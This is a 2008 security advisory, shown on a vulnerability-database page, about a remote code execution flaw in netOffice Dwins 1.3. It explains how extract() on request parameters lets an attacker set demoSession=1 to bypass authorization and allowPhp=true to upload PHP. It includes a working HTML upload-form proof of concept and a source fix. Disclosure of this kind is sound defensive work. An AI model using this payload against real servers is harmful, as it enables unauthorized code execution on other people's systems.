Vulners
Lucene search
netoffice-exec.txt
`netOffice Dwins 1.3 Remote code execution.
--------------------------------------------------------
Product: netOffice Dwins
Version: 1.3 p2
Vendor: http://netofficedwins.sourceforge.net/
Date: 02/29/08
- Introduction
"netOffice Dwins is a free web based time tracking, timesheet, and
project management environment."
- Details
It is possible for an attacker to bypass authorization, upload arbitrary
PHP files, and then execute them on the server.
netOffice extracts all GET, POST, SESSION, SERVER, and COOKIE parameters
into the local variable space. This has the same effect as turning
on register globals. The code below is from includes/library.php.
//GET array
if (!empty($_GET)) {
extract($_GET);
} else if (!empty($HTTP_GET_VARS)) {
extract($HTTP_GET_VARS);
}
This lets an attacker set demoSession=1 to bypass authorization and
freely access any part of the application. Setting the variable to one
bypasses the first check ($demoSession != true) but the second boolean
expression ($demoSession == 'true') evaluates to false thereby not
initializing the action variable to an empty string.
// check session validity, except for demo user
if (($checkSession == true) && ($demoSession != true)) {
// a client user trying to get outside of the "client project site"
if (($profilSession == 3) && (!strstr($_SERVER['PHP_SELF'],
'projects_site'))) {
header('Location: ../index.php?session=false');
exit;
}
// disable actions if demo user logged in demo mode
if (!empty($action)) {
if ($demoSession == 'true') {
echo "true";
$closeTopic = '';
$addToSiteTask = '';
$removeToSiteTask = '';
$addToSiteTopic = '';
$removeToSiteTopic = '';
$addToSiteTeam = '';
$removeToSiteTeam = '';
$action = '';
$msg = 'demo';
}
}
Next an attacker could use access the uploadfile.php form without
logging in to upload and execute PHP files. Normally php files are
not allowed unless the allowPhp variable is set to true.
- Proof of Concept
<form accept-charset="UNKNOWN" method="POST"
action="http://target/netoffice/projects_site/uploadfile.php?demoSession=1&allowPhp=true&action=add&project=&task=#filedetailsAnchor"
name="feeedback" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="100000000"><input
type="hidden" name="maxCustom" value="">
<table cellpadding="3" cellspacing="0" border="0">
<tr><th colspan="2">Upload Form</th></tr>
<tr><th>Comments :</th><td><textarea cols="60" name="commentsField"
rows="6"></textarea></td></tr>
<tr><th>Upload :</th><td><input size="35" value="" name="upload"
type="file"></td></tr>
<tr><th> </th><td><input name="submit" type="submit"
value="Save"><br><br></td></tr></table>
</form>
- Solution
Authors were notified on 2/19, no fix is currently available. Edit
the source to prevent authorization bypass.
in includes/library.php change
if ($demoSession == 'true') {
to
if ($demoSession == true) {
Author: dB
Email: dB [at] rawsecurity.org
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4